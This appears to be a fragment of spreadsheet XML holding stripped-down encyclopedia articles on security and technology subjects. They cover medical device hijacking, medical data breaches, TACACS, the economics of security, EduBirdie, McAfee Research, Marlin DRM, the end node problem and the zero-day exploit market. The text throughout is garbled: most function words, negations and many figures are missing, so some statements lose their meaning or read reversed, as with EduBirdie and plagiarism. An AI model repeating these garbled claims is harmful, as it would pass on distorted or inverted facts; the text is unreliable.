facilities unifying digital infrastructure order maintain full control throughout process. scope various informal assessments estimated medical device hijacking currently impacts majority hospitals worldwide remains undetected bulk them. technologies necessary detect medical device hijacking, lateral movement attackers command control within targeted medical devices, installed great majority hospitals february 2017. statistic would note hospital beds, roughly fifteen medical devices (usually internet things (iot) connected) bed. that addition centralized administration systems, hospital diagnostic labs utilized medical devices, emr/ehr systems ct/mri/x-ray centers within hospital. detection remediation these attacks hard detect even harder remediate. deception technology (the evolution automation honeypot honey-grid networks) trap lure attackers move laterally within networks. medical devices typically must software reloaded manufacturer. hospital security staff equipped able access internals approved devices. they become reinfected quickly takes medical device potentially re-infect rest hospital. countermeasures december 2016 food drug administration released recommendations legally enforceable medical device manufacturers maintain security internet-connected devices. united states government accountability office studied issue concluded must become proactive minimizing security flaws guiding manufacturers specific design recommendations instead exclusively focusing protecting networks utilized collect transfer data medical devices. following table provided report highlights design aspects medical implants affect overall security device focus. also computer security medical systems references</t>
  </si>
  <si>
    <t>Egenera</t>
  </si>
  <si>
    <t>egenera, inc. multinational cloud manager data center infrastructure automation company corporate headquarters boxborough, massachusetts united states. privately held company approximately employees. founded march 2000, company named network world startups watch 2002 winner annual "red herring north america" award given herring magazine 2006. egenera maintains overseas headquarters united kingdom, japan hong kong. history egenera founded vern brownell march 2000.the company launched first product, egenera bladeframe, october, 2001. october 2006, egenera announced plan create separate line business order make virtualization management software, called manager, available agreement server vendors.in december 2012, egenera acquired fort technologies developer cloud management software. partners 2013, egenera agreements following vendors: dell fujitsu hewlett packard also cloud computing storage virtualization network virtualization virtualization blade server fabric computing unified computing references</t>
  </si>
  <si>
    <t>Medical data breach</t>
  </si>
  <si>
    <t>medical data, including patients' identity information, health status, disease diagnosis treatment, biogenetic information, involve patients' privacy also special sensitivity important value, bring physical mental distress property loss patients even negatively affect social stability national security leaked. however, development application medical must rely large amount medical data algorithm training, larger diverse amount data, accurate results analysis prediction however, application data technologies data collection, analysis processing, cloud storage, information sharing increased risk data leakage. united states, rate breaches increased time, million records breached 2017. there data breaches 10,000 records, breaches healthcare data 100,000 individuals, breaches affected half million individuals, breaches personal protected health information million individuals. black market health data february 2015 report claimed organized crime networks ways selling health data black market.in 2015 beazley group employee estimated medical records could sell black market us$40-50.crime primary cause medical data breaches. data lost theft, data loss, hacking, unauthorized account access ways medical data breaches happen. among reported breaches medical information united states networked information systems accounted largest number records breached. there large number data breaches happening health care system, among business associates health care providers continuously gain access patients' data. list data breaches 2021, health service executive republic ireland victim cyberattack involving ransomware, health service executive cyberattack, admission records test results present sample data reviewed financial times. october 2018, centers medicare medicaid services reported around 75,000 individual records affected data breach took place agent broker portal. 2018, social indicators research published scientific evidence 173,398,820 (over million) individuals affected october 2008 (when data collected) september 2017 (when statistical analysis took place). 2015, anthem inc. lost data million people anthem medical data breach 2014 million people using complete health systems data stolen 2013-14 million people using montana department public health human services data stolen 2013 million people using advocate health hospitals corporation data stolen 2011 million users tricare services data stolen employee error science applications international corporation 2011 million people using health data stolen 2011 million people using nemours foundation data stolen 2010 6800 people using york-presbyterian hospital columbia university medical center data breached. response, organizations agreed united states department health human services us$4.8 million dollar fine. 2009 million people using bluecross blueshield tennessee data stolen regulation united states, health insurance portability accountability health information technology economic clinical health require companies report data breaches affected individuals federal government. health information privacy health insurance portability accountability 1996 (hipaa). parts 164, standards privacy individually identifiable health information security standards protection electronic protected health information. hipaa includes provisions designed save health care businesses money encouraging electronic transactions, well regulations protect security confidentiality patient information. privacy rule became effective april 2001, covered entities (health plans, health care clearinghouses, health care providers conduct certain financial administrative transactions electronically) april 2003 comply. this security provision became effective april 2003. health insurance portability accountability (hipaa) baseline federal regulations governing medical information. three things: i.establish structure personal health information disclosed establish rights individuals respect health information; ii.specify security standards retention transmission electronic patient information; iii.need common format data structure electronic exchange health information. california-specific laws california’s medical privacy laws, primarily confidentiality medical information (cmia), data breach sections civil code, sections health safety code, provide hipaa-like protections although terminology different. hipaa establishes federal "minimum standard" applies gaps california law, hipaa also specifies stricter state laws override supersede hipaa. california's health care privacy laws apply providers provide personal health records (phr), hipaa applies provider providing business associate covered entity. federal grant individuals right file lawsuit event data breach (only attorney general file lawsuit), california does.this means california sets higher standard medical privacy, individuals california enjoy stronger legal protections ways hold entities violate medical privacy accountable. legal framework patient data cared processed data protection 2018 (dpa), incorporates general data protection regulation (gdpr) law, common duty confidentiality (cldc). data protection legislation requires collection processing personal data fair, lawful transparent. this means collection processing data defined data protection legislation must always valid lawful basis must also meet requirements cldc. china, article "national health care data standards, security services management measures (for trial implementation)" (national health planning development (2018) promulgated national health care commission 2018 states, "the responsible unit shall adopt measures data classification, important data backup, encryption authentication guarantee security health care data." however, scope definition important data covered. although "information security technology-healthcare data security guide" (the "guide") issued national standardization committee also proposes important data evaluated approved accordance regulations, likewise definition connotation definition important data. also computer security medical systems medical privacy data loss references further reading "hackers warn security". news. united kingdom. june 2011. thurton, david february 2016). "inuvik hospital confirms potential data breach employees". news: north. yellowknife, n.w.t. external links office civil rights. "breaches affecting more individuals". breach portal. u.s. department health human services. retrieved june 2016.</t>
  </si>
  <si>
    <t>TACACS</t>
  </si>
  <si>
    <t>terminal access controller access-control system (tacacs, refers family related protocols handling remote authentication related services network access control centralized server. original tacacs protocol, dates back 1984, used communicating authentication server, common older unix networks including limited arpanet, milnet bbnnet. spawned related protocols: extended tacacs (xtacacs) proprietary extension tacacs introduced cisco systems 1990 without backwards compatibility original protocol. tacacs xtacacs allow remote access server communicate authentication server order determine user access network. tacacs plus (tacacs+) protocol developed cisco released open standard beginning 1993. although derived tacacs, tacacs+ separate protocol handles authentication, authorization, accounting (aaa) services. tacacs+ largely replaced predecessors. history tacacs originally developed 1984 bbn, later known technologies, administration arpanet milnet, unclassified network traffic darpa time would later evolve u.s. department defense's niprnet. originally designed means automate authentication allowing someone already logged host network connect another network without needing re-authenticate first formally described bbn's brian anderson access control system protocols, tech memo cc-0045 minor telnet double login avoidance change december 1984 ietf 927. cisco systems began supporting tacacs networking products late 1980s, eventually adding several extensions protocol. 1990, cisco's extensions tacacs became proprietary protocol called extended tacacs (xtacacs). although tacacs xtacacs open standards, craig finseth university minnesota, cisco's assistance, published description protocols 1993 ietf 1492 informational purposes. technical descriptions tacacs tacacs defined 8907 (older 1492), uses (either udp) port default. tacacs allows client accept username password send query tacacs authentication server, sometimes called tacacs daemon. determines whether accept deny authentication request sends response back. (routing node accepting dial-up line connections, user would normally want into) would allow access not, based upon response. way, process making decision "opened algorithms data used make decision complete control whomever running tacacs daemon. xtacacs extended tacacs (xtacacs) extends tacacs protocol additional functionality. also separates authentication, authorization, accounting (aaa) functions separate processes, allowing handled separate servers technologies. tacacs+ tacacs+ cisco designed extension tacacs encrypts full content packet. moreover, provides granular control form command-by-command authorization. tacacs+ generally replaced tacacs xtacacs recently built updated networks. tacacs+ entirely protocol compatible predecessors, tacacs xtacacs. because connection oriented protocol, tacacs+ able detect correct network transmission errors. comparison radius tacacs+ uses (while radius operates udp).because connection-oriented protocol, tacacs+ implement transmission control. radius, however, required detect correct transmission errors packet loss timeouts, etc., makes connectionless. radius encrypts users' password travels radius client radius server. information username, authorization, accounting transmitted clear text. therefore, vulnerable different types attacks. tacacs+ encrypts information mentioned therefore vulnerabilities present radius protocol. rfcs 9105 yang data model terminal access controller access-control system plus (tacacs+) 8907 terminal access controller access-control system plus (tacacs+) protocol 1492 access control protocol, sometimes called tacacs tacacs user identification telnet option implementations (client-side) pam_tacplus, tacacs+ protocol client library module implementations (server-side) freeradius tacacs+ module, open-source implementation available since version tac_plus shrubbery, open-source implementation linux tac_plus pro-bono-publico, open-source implementation linux tac_plus tac_plus added webadmin longer updated) cisco identity services engine, proprietary implementation miniorange, proprietary implementation portnox tacacs+-as-a-service, proprietary implementation cloud-hosted service pulse secure pulse policy secure proprietary implementation tacacs.net, proprietary implementation tacacs+ windows also diameter radius references external links analysis tacacs+ protocol implementations security standpoint, openwall tacacs+ benefits best practices</t>
  </si>
  <si>
    <t>Echoworx</t>
  </si>
  <si>
    <t>echoworx, email encryption software company, based toronto, ontario, canada, offices certificate authority, echoworx member microsoft root certificate program apple root certificate program. echoworx operates several data centers, including locations united states europe. history founded 2000, echoworx headed president michael ginsberg, formerly certapay, email money transfer technology company.in december 2005, at&amp;t first telecommunications companies united states white-label provide echoworx encryption services subscribers.british telecom launched secure mail encrypted message exchange emx) based public infrastructure (pki) october 2007.apptix application service provider (asp) technology company providing hosted business services software service) small medium-sized businesses. provided apptix secure mail powered echoworx part hosted email security services portfolio. launched service april 2010.hostway, infrastructure-as-a-service provider, partnered echoworx provide encryption services 2011.the company's original priority small business market, evolved enterprise corporate market. also email encryption public-key infrastructure secure messaging end-to-end encryption references</t>
  </si>
  <si>
    <t>Economics of security</t>
  </si>
  <si>
    <t>economics information security addresses economic aspects privacy computer security. economics information security includes models strictly rational “homo economicus” well behavioral economics. economics security addresses individual organizational decisions behaviors respect security privacy market decisions. economics security addresses core question: agents choose technical risks exists technical solutions mitigate security privacy risks? economics addresses question, also inform design decisions security engineering. emergence economics security national security canonical public good. economic status information security came intellectual fore around 2000. case innovations arose simultaneously multiple venues. 2000, ross anderson wrote, information security hard. anderson explained significant difficulty optimal development security technology incentives must aligned technology enable rational adoption. thus, economic insights integrated technical design. security technology enable party risk invest limit risk. otherwise, designers simply counting altruism adoption diffusion. many consider publication birth economics security. also 2000 harvard, camp school government wolfram department economics argued security public good rather extant vulnerabilities associated negative externality value. vulnerabilities defined work tradable goods. years later, idefense, mozilla extant markets vulnerabilities. 2000, scientists computer emergency response team carnegie mellon university proposed early mechanism risk assessment. hierarchical holographic model provided first multi-faceted evaluation tool guide security investments using science risk. since time, cert developed suite systematic mechanism organizations risk evaluations, depending size expertise organization: octave. study computer security investment risk avoidance become standard practice. 2001, unrelated development, lawrence gordon martin loeb published using information security response competitor analysis system. working paper published article written 2000. these professors, maryland's smith school business, present game-theoretic framework demonstrates information security prevent rival firms gaining sensitive information. context, article considers economic (i.e., cost-benefit) aspects information security. authors came together develop expand series flagship events name workshop economics information security. examples findings economics security proof work security technology designed stop spam altering economics. early paper economics information security argued proof work cannot work. fact, finding proof work cannot work without price discrimination illustrated later paper, proof work work. another finding, critical understanding current american data practices, opposite privacy not, economic terms anonymity, rather price discrimination. privacy price discrimination authored andrew odlyzko illustrates appear information pathology collection data fact rational organizational behavior. varian presented three models security using metaphor height walls around town show security normal good, public good, good externalities. free riding result, case. lawrence gordon martin loeb wrote economics information security investment. gordon–loeb model considered many first economic model determines optimal amount invest protect given information. model takes account vulnerability information security breach potential loss breach occur. also computer insecurity defensive programming (secure coding) security engineering hacking software security assurance computer security trusted system cyber insurance references external links centers study economics security carnegie mellon university heinz college carnegie mellon university privacy cambridge university computer science laboratory indiana university school informatics university minnesota university michigan school information harvard university division engineering applied sciences dartmouth hosts includes tuck school well computer science department studying economics information security. resources economics security ross anderson maintains economics information security page. alessandro acquisti corresponding economics privacy resources page. jean camp economics information security links past workshops, corresponding papers, well current conferences calls papers. also provides events, books, past workshops, annotated bibliography. return information security investment provides self-assessment questionnaire, papers links information security economics resources. cyber attacks: economic policy challenge, published cepr's policy portal vox, provides non-technical overview policy measurement issues related economics cybersecurity.</t>
  </si>
  <si>
    <t>Systems Security Certified Practitioner</t>
  </si>
  <si>
    <t>Systempunkt</t>
  </si>
  <si>
    <t>systempunkt ("system point") type critical, vulnerable point system. system physical system (such computer network) term usually used referring market french steel market, international flax market, etc.) systempunkt point system vulnerable disruption many small interactions, swarm disruptions attacks cascade system collapse possibly resulting financial loss, supply shortages, destabilization. examples systempunkt vulnerable operational failure, vulnerable operation location. rather, operation interacts communication, exchange movement objects disrupted dependencies flows data goods failure longer operating. effects network significant specific object. computer servers fail denial service attack longer support application user base depends them; example attack systempunkt. systempunkt attack related simple sabotage. grandiose objective: collapse dependent network state social order. theoretical example might coal miners country went strike. this could cause coal shortage which, cascading economy, could force partial collapse, ultimately forcing desired major social changes. etymology term coined john robb.the etymology modern portmanteau word derived german term 'schwerpunkt' english language word 'system'. german term blitzkrieg warfare's schwerpunkt literally means 'heavy point' often translated centre gravity focal point. used relation military context use, describes focal point attack enemy line, usually vulnerable part line, lead collapse enemy line defense. whereas schwerpunkt focuses single object attack, systempunkt representative network effects. link fail, necessarily weakest, effects network continue cascade, avalanche effect spreads throughout system. repercussions continuous, exhibit repeating failures aftershocks whole network. descriptively, systempunkt similarities heinz guderian's adage "nicht kleckern, klotzen!" ("don't fiddle, smash!") though reverses intent effect intends actualize cascading events domino type dependencies. practice, "fiddle [with systempunkt] [the system] smashes". criticism concept criticized. references external links phone systempunkt, another theoretical systempunkt attack scenario</t>
  </si>
  <si>
    <t>Edesix</t>
  </si>
  <si>
    <t>edesix manufacturer body worn video digital evidence solutions based edinburgh, scotland. company designs, develops manufacturers hardware software. edesix founded edinburgh 2002 richie mcbride robin iddon. previously mcbride iddon worked together spider systems, acquired shiva corporation 1995, became founders axon networks. 1996, axon networks acquired 3com million. june 2017, ifsec 2017, edesix launched videotag body-worn camera series.edesix acquired vigilant solutions october 2018 part motorola solutions vigilant solutions acquired motorola solutions january 2019. references</t>
  </si>
  <si>
    <t>EduBirdie</t>
  </si>
  <si>
    <t>edubirdie professional writing academic platform offers services, including ghostwriting, essay creation, proofreading, plagiarism checker. history edubirdie founded 2015 plan services registered law. client engagement estimated 500,000 users month. edubirdie services include plagiarism grammar checking tools, citation generators, editing, proofreading, others. besides international version aimed market, platform available local variations canada. provides students writing samples research assistance help perfect essay writing skills. furthermore, edubirdie tolerate plagiarism.in 2019, edubirdie started operate owner, technology bring company business model. later year, edubirdie partnered chadd donated every order help children adhd syndrome.after numerous spelling-related accusations twitter, edubirdie offered proofread donald trump's tweets free charge prevent grammatical mistakes.in 2019 edubirdie.com unveiled edubridie, service provide professional support brides, grooms wedding party members writing vows speeches. work process structure edubirdie connects users writers auction process, writers proposals available. unlike majority freelance platforms, writer chosen hired directly company internal multi-step process: registration test writing essay testing document verification. tools company's work areas development free tools different types student. they include: plagiarism checker grammar checker citation, topic, thesis generators complex correction tool (currently beta). paraphrasing tool words minutes, words pages case converters word counter alphabetizer calculator essay rewriter reception perceptions edubirdie also employer college students, offering post-college jobs ambassador programs current students.in 2020 edsurge reported edubirdie part larger industry contract cheaters, sites like edubirdie connect clients freelance writers cheating activities. marketing 2018, edubirdie promoted social media influencers youtubers lead investigation conducted resulted thousands videos removed youtube promoting edubirdie cheating. done academic policy youtube students help academic related tasks considered cheating. videos earned total million views almost channels promoting homework cheating. researches 2019, edubirdie offered proofread president trump's tweets, free charge grammatical mistakes tweets. hangover test (u.s. national beer april 2021). study aims figure brands beer smallest impact person's productivity morning night out. they're looking recruit 28–40 participants drink popular american beer brands they're capable following day, hungover. gen-z spending their time while quarantined. gen-z trying part staying home social-distancing help slow spread covid-19. however, leaving house boring. edubirdie staff surveyed users find exactly younger generation occupy time. united states cheating patterns. global research revealed nationwide study patterns, uncovering english country's cheated subject. study, conducted edubirdie, analyzes topics essays written external authors students turn university college courses. zodiac signs cheating. this survey showed many people astrological sign ever cheated come close cheating relationship. result, shown leos likely cheat partner (36% respondents), virgos loyal (only cheaters). edubirdie analysed 500,000 words essays submitted editing find words commonly misspelled student essays. studying songs research. analyzing 500,000 songs playlists tagged studying, edubirdieedubirdie found songs artists suitable studying. edubirdie analyzed current ruling monarchs families find universities famous among royalty. study showed university oxford biggest number still living graduates royal families. most successful college dropouts. study aimed show people finish education still became successful according forbes billionaires list. july 2021 edubirdie looking hire smart watchers, people would watch netflix amazon prime series part study shows popular series motivate people study most. also copyright author editing content similarity detection academic dishonesty comparison anti-plagiarism software languagetool natural language processing foreign language writing references</t>
  </si>
  <si>
    <t>TCO Certified</t>
  </si>
  <si>
    <t>certified certification initially created swedish confederation professional employees (tco) guarantee computer products purchased employers maintain ecological standards sufficiently ergonomic prevent long term health issues users. became known 1990s certification computer displays. dating back 1992, oldest certifications user electronics. history early 1980s, swedish confederation professional employees (tco), worker's union, foresaw computers would become important work utility sought establish ergonomic radiation standards computer displays protect members health issues daily use. back then, increasing computers monitors white collar work environments caused widespread complaints employees experiencing visual fatigue visual stress after-work hours (also called "vdu sickness"). fact, early generations computer displays frequently related strains headache flickering, jitter radiation. 1986, published basic list requirements test protocols verify display continuous daily help employers choose right hardware work places.the test became early success translated multiple languages used also unions countries push ergonomic work environment. success display checklist resulted foundation certified, spin-off union headed erik boivie peter magnusson, among others, goal creating international certification standards implemented directly manufacturers. starting tco'92 1992, certification minimum standards emissions, jittering electronic safety computer monitors. later standards product categories peripherals computer itself. certified requirements publishes guidelines every years. standards expanded covering computer monitors 1992 wide array devices today. product categories certified available following products: displays, notebooks, tablets, smartphones, desktops, all-in-one pcs, projectors, headsets, data center products: network equipment, data storage products servers. references further reading boivie, per-erik (2007). global standard: computer displays worldwide logo. stockholm: premiss. isbn 978-91-85343-43-0. external links official website</t>
  </si>
  <si>
    <t>McAfee Research</t>
  </si>
  <si>
    <t>trusted information systems (tis) computer security research development company 1980s 1990s, performing computer communications (information) security research organizations nsa, darpa, arl, afrl, spawar, others. history founded 1983 veteran steve walker, various times employed notable information security experts including david elliott bell, martha branstad, john pescatore, marv schaefer, steve crocker, marcus ranum, john williams, steve lipner carl ellison. headquartered glenwood, maryland, rural location. company started walker's basement shady lane glenwood, company grew, rather move baltimore washington d.c. suburbs, small office building constructed land next walker's home route products projects included following: trusted xenix, first commercially available operating system; trusted mach, research project influenced dtos eventually selinux; domain type enforcement (dte) likewise influenced selinux; fwtk firewall toolkit (the first open source firewall software) 1993; first whitehouse.gov e-mail server hosted headquarters june 1993 january 1995; gauntlet firewall 1994, first commercial firewall products, broad range internet standards, including s/mime, snmp, dns, dnssec, many others. this firewall became inception third generation firewall; security (ipsec) product late 1994, known first ipsec commercial product history; encryption recovery technology integrated ipsec, isakmp, ike, rsa.tis's operating system work directly affected bsd/os, gauntlet firewall ipsec based well linux, freebsd, darwin, others. post company company went public 1996 soon afterwards attempted acquire inc.; instead acquired 1998 network associates (nai), later became mcafee, already bought inc. 1997. security research organization became labs gauntlet engineering development organization folded network associates' engineering development. labs went couple branding changes complemented network associates' branding efforts. 2001 name changed network associates laboratories better match corporate identity. then, 2002-2003, major branding initiative network associates culminating selection flag brand, mcafee. result, security research organization became mcafee research. 2003, sparta, inc., employee-owned company, acquired network security branch mcafee research. 2005, sparta acquired remaining branches mcafee research, organized security research division (srd) information systems security operation (isso). 2008, cobham, plc, british aerospace company, acquired sparta. there organizational changes isso affect security research. separate path, tis's primary commercial product, gauntlet firewall, acquired 1999 mcafee secure computing corporation (scc), used tis's major competitors, time mcafee interested firewall vendor. code base integrated secure computing's firewall product branded sidewinder firewall, returned mcafee secure computing acquired 2008, re-branded mcafee enterprise firewall. product line came 2013, following mcafee's acquisition another major firewall vendor, finland-based stonesoft. mcafee announced october 2013 intention migrate existing installed base firewalls stonesoft's stonegate. references external links linkedin alumni group firewall toolkit archive stephen walker congressional testimony</t>
  </si>
  <si>
    <t>McAfee Change Control</t>
  </si>
  <si>
    <t>mcafee change control commercial file integrity monitoring solution windows- linux-based systems developed mcafee. external links mcafee security standards council</t>
  </si>
  <si>
    <t>System Development Corporation</t>
  </si>
  <si>
    <t>system development corporation (sdc) computer software company based santa monica, california. founded 1955, considered first company kind. history began systems engineering group sage air-defense system rand corporation. april 1955, government contracted rand help write software sage project. within months, rand's system development division employees developing sage applications. within year, division 1,000 employees. rand spun group 1957 non-profit organization provided expertise united states military design, integration, testing large, complex, computer-controlled systems. became for-profit corporation 1969, began offer services organizations rather american military. first systems produced sage system, written an/fsq-7 [q-7] computer, sage system training program [sstp], written series computers. notable based vacuum tubes. intended duplex, computers operational sites, single installed complex santa monica (2400 2500 colorado; occupied water garden). said time building, separate structure, required half conditioning used entire city santa monica perhaps jest, close truth. late 1961 became computer program integration contractor [cpic] force satellite control network, maintained role many years. part role, wrote software delivered afscn's string satellite tracking stations abroad. ownership 1981, sold board directors burroughs corporation. 1986, burroughs merged sperry corporation form unisys, folded unisys defense systems. 1991, unisys defense systems renamed paramax, wholly owned subsidiary unisys, could spun reduce unisys debt.in 1995, unisys sold paramax loral corporation, although small portion containing projects originated sdc, remained unisys. 1996, loral sold paramax lockheed martin. 1997, paramax business unit separated lockheed martin control frank lanza (who loral's president ceo); became subsidiary communications. 2019, communications merged harris corporation form l3harris technologies. software projects 1960s, developed timesharing system an/fsq-32 (q32) mainframe computer advanced research projects agency (arpa). q-32 first systems support multiple users inter-computer communications. experiments dedicated modem connection tx-2 massachusetts institute technology computer communication applications e-mail. 1960s, also developed jovial programming language (jules' version international algorithmic language, jules schwartz) time-shared data management system (tdms), inverted file database system. both commonly used real-time military systems. references further reading records system development corporation charles babbage institute, university minnesota. includes history file information rand corporation, system development division, system development corporation. contains correspondence, meetings minutes, symposiums presentations, product literature, technical literature, reports systems engineering, systems design, human-computer interaction, user interfaces, subject file. oral history interview jules schwartz charles babbage institute, university minnesota. when rand organized system development corporation, schwartz went company. schwartz describes association sage, work timesharing an/fsq-32 computer, computer networks, control system projects (including tdms). oral history interview robert fano charles babbage institute, university minnesota. fano discusses move computer science information theory. topics include system development corporation (sdc) among others. external links system development corporation history</t>
  </si>
  <si>
    <t>Marlin (DRM)</t>
  </si>
  <si>
    <t>marlin platform, created open-standards community initiative called marlin developer community (mdc). develops necessary technology, partners, services enabling creation interoperable digital content distribution services. marlin technology provides capabilities consumers manage relationships among devices, network services, digital content. with marlin, service providers device markers create support content services open networks. history formed 2005 five companies intertrust, panasonic, philips, samsung sony. released first specifications may, 2006. marlin founders also formed marlin trust management organization (mtmo) neutral trust management licensing organization. mtmo started commercial operations january, 2007. technology marlin created specific design goals. first, marlin allows consumer devices import content multiple independent services accommodate peer-to-peer interactions. second, marlin based general-purpose rights management architecture. marlin specifications define capabilities architecture devices services interoperate. most marlin implementations include core system specification defines basic components, protocols, consumer domain model enable interoperability marlin-enabled devices services. this specification based octopus nemo reference technologies, adapted peer-to-peer device interactions. rights management within marlin based octopus general-purpose architecture. center octopus system graph-based relationship engine. marlin, octopus node objects used represent system entities (such users devices), links nodes represent relationships. system nodes links manages where, how, content used marlin system. octopus runs various platforms media format cryptographically agnostic. nemo acronym networked environment media orchestration. provides services-based framework trusted connections various components marlin system. based services standards, nemo defines service interfaces, service access policies, support trust relationships among distributed entities play well-defined certified roles. nemo framework allows marlin components deliver protected messages exchange authenticated authorized entities. services supported nemo operated together other, application-specific media services required nemo-compliant. products primary products implementation marlin include: expressplay: expressplay hosted service provided intertrust introduced may, 2013. primarily designed integrate marlin content protection internet-based content distribution services. expressplay provides hosted marlin server component marlin management client-side android. bluewhale marlin broadband server: bluewhale marlin broadband server configurable implementation marlin server providing support necessary secure delivery digital content marlin clients. order prepare appropriate information requested clients, bluewhale server integrates service provider’s back-end business logic, using xml-based interface. translates business logic marlin rights objects, creating managing licenses user registrations, example. bento4 packager: bento4 packager software tool content packaging parsing works marlin clients. this tool packages, encrypts protects content files server side. client side, tool provides content decryption parsing. sushi marlin client sdk: sushi marlin client used create client-side functionality. this provides primary marlin components necessary determining license conditions controlling access protected content. adapted hardware devices media playback service access applications also utilize provide functionality. 2013, intertrust longer providing sushi marlin client sdk. partners october 2008, announced formation marlin partner program (mpp) initial launch including companies. january, 2014, marlin site listed partner companies.member partners identify, develop, provide variety technical components integration services creating marketplace marlin solutions. network operators, service providers, device manufacturers, companies deploying marlin-based products services work member companies. trust services technology based upon open standards, security system managed independent entity, mtmo. mtmo maintains integrity security system management services. deployment marlin commercially deployed worldwide variety devices services. marlin included national iptv standard japan deployed actvila, web-based portal, launched 2007. actvila service portal, created partners hitachi, panasonic, sharp, sony, toshiba, included roll-out internet-enabled tvs. sony uses marlin playstation network, allowing users video download service share purchased rented content ps3, ps4, systems. televisions blu-ray players, support philips service. tencent online video service. following standard bodies specified marlin specifications: ultraviolet digital rights authentication cloud-based distribution system standard digital entertainment content ecosystem open iptv forumthe following national initiatives selected marlin: italian internet services platform developed tivu consortium youview open internet connected platform united kingdom. specifications hd-forum france.other consumer media services, baidu-owned iqiyi pptv china, licensed marlin. references external links marlin developer community</t>
  </si>
  <si>
    <t>End node problem</t>
  </si>
  <si>
    <t>node problem arises individual computers used sensitive work and/or temporarily become part trusted, well-managed network/cloud used risky activities and/or join untrusted networks. (individual computers periphery networks/clouds called nodes.) nodes often managed trusted network‘s high computer security standards. nodes often weak/outdated software, weak security tools, excessive permissions, mis-configurations, questionable content apps, covert exploitations. cross contamination unauthorized release data within computer system becomes problem. within vast cyber-ecosystem, nodes often attach transiently clouds/networks, trustworthy others not. examples: corporate desktop browsing internet, corporate laptop checking company webmail coffee shop's open wi-fi access point, personal computer used telecommute gaming night, within smartphone/tablet previous use/device combinations). even fully updated tightly locked down, nodes ferry malware network (e.g. corrupted webpage infected email message) another, sensitive network. likewise, nodes exfiltrate sensitive data (e.g. keystrokes screen-capture). assuming device fully trustworthy, node must provide means properly authenticate user. other nodes impersonate trusted computers, thus requiring device authentication. device user trusted within untrustworthy environment determined inboard sensors' feedback). collectively, risks called node problem. there several remedies require instilling trust node conveying trust network/cloud. cloud’s weakest link cloud computing characterized vast, seemingly endless, array processing storage rent computer. recent media attention focused security within cloud. many believe real risk within well monitored, 24-7-365 managed, full redundancy cloud host many questionable computers access cloud. many clouds fisma-certified whereas nodes connecting rarely configured standard. ever growing risk from 2005 2009, greatest growing threats personal corporate data derived exploits users' personal computers. organized cyber-criminals found profitable internally exploit many weak personal work computers attack heavily fortified perimeters. common example stealing small business's online banking account access. solutions eliminate node problem, allow authenticated users trusted remote computers safe environments connect network/cloud. there many ways accomplish existing technology, different levels trust. many companies issue typical laptops allow specific computers remotely connect. example, department defense allows remote computers connect network direct internet browsing) uses two-factor authentication. some organizations server-side tools scan and/or validate node's computer, communicating node's trusted platform module (tpm). higher level trust obtained issuing immutable, tamper-resistant client local storage, allowing connect device user authentication, remotely providing software (via etherboot), providing remote desktop browser access sensitive data. less expensive approach trust hardware (corporate, government, personal, public) provide known kernel software require strong authentication user. example, dod’s software protection initiative offers lightweight portable security, livecd boots creating pristine, non-persistent, node using common access card software authentication networks. also host (network) node (networking) secure node references</t>
  </si>
  <si>
    <t>Market for zero-day exploits</t>
  </si>
  <si>
    <t>market zero-day exploits refers commercial activity happens around trafficking software exploits. introduction software vulnerabilities "exploits" used remote access stored information information generated real time. when people software, case countries today given monopolistic nature internet content service providers, specific vulnerability used thousands millions people. context, criminals become interested vulnerabilities. 2014 report mcafee's center strategic international studies estimates cost cybercrime cyberespionage somewhere around $160 billion year. worldwide, countries appointed public institutions deal issue, likely conflict interest government access people's information order prevent crime. result, national security agencies criminals hide certain software vulnerabilities users original developer. this type vulnerability known zero-day exploit. much said academia regular media regulation zero-day exploits market. however, difficult reach consensus definitions zero-day exploits rather vague applicable, define certain software malware used. addition, conflict interest within operations state could prevent regulation make mandatory disclosure zero-days. governments face trade-off protecting citizens' privacy reporting vulnerabilities private companies hand undermining communication technologies used targets—who also threaten security public—on other. protection national security exploitation software vulnerabilities unknown companies public ultimate resource security agencies also compromises safety every single user third party, including criminal organizations, could making resource. hence, users private firms incentives minimize risks associated zero-day exploits; former avoid invasion privacy latter reduce costs data breaches. these include legal processes, costs related development solutions "patch" original vulnerability software costs associated loss confidence clients product. description ablon, libicki golay explained great extent inner workings zero-day market. main findings separated five components: commodity, currency, marketplace, supply demand. these components relationship pricing described. definition given demand component also challenged paramount understand nature markets (i.e. white, gray black) regulation lack thereof. commodity exploits digital products, means information goods near-zero marginal production costs. however, atypical information goods. unlike e-books digital videos, lose value easy replicate fact exposed, original developer "patch" vulnerability, decreasing value commodity. value zero reasons: distribution patch asymmetric developers could original create variant decreased cost. they also atypical time-sensitive commodities. companies updating software regular basis patch useful lapse versions; sometimes vulnerability corrected without external report. third, even confidential transactions, exploit create dysfunction user-end, exposing vulnerability leading loss value. sense, exploits non-excludable non-rivalrous, users zero exploit certain point, visible impact company question. this could result company likely patch exploit, resulting limited period time exploit available users. currency cases, transactions typically designed protect identity least parties involved exchange. while dependent type market—white markets traceable money—most purchases made stolen digital funds (credit cards) cryptocurrencies. while latter dominant trend last years, prices gray market dollars, shown leaks hacking team's email archive. marketplace classically, black markets—like illegal weapons narcotics—require huge network trusted parties perform transactions deal-making, document forgery, financial transfers illicit transport, among others. difficult enforce legal agreement within networks, many criminal organizations recruit members close home. this proximity element increases cost transaction intermediaries required transnational transactions, decreasing overall profit original seller. zero-days, hand, virtual products easily sold without intermediaries internet available technologies strong enough provide anonymity cost. even need intermediaries, "unwitting data mules" used avoid evidence wrongdoing. this black market lucrative compared gray markets. gray markets, involve transactions public institutions charge national security, usually require third parties hide traces transactions. hacking team archive, example, contains alleged contracts ecuadorian national secretariat intelligence used intermediaries: robotec theola. archive, said third-party companies cicom robotec negotiated contracts behalf respectively. less likely white markets face problem interest hide transaction, quite opposite companies actively promote patches. supply supply chain complex involves multiple actors organized hierarchies, administrators top, followed technical experts. next intermediaries, brokers vendors sophisticated, finally followed witting mules. within chain command, find multiple products. while zero-day exploits "found" developed subject matter experts only, exploits easily commercialized almost person willing enter black market. there reasons this. first, devices outdated deprecated software easily targeted exploits otherwise would completely useless. second, "half-day exploits" used graphical interfaces learned freely available tutorials, means little expertise required enter market seller. coexistence zero-day half-day markets influences resilience black market, developers keep moving towards sophisticated end. while take-downs high organized crime increased, suppliers easily replaced people lower levels pyramid. take less find provider take-down operation easily last months. getting top, however, requires personal connections good reputation, digital black market different physical one. half-day exploits usually traded easily accessible places zero-days often require "double-blind" auctions multiple layers encryption evade enforcement. this done forums boards, hence transactions occur extremely vetted spaces. demand buys zero-day exploits defines kind market dealing with. afidler differentiates white, gray black markets following market-sizing methodology harvard business school guide. here 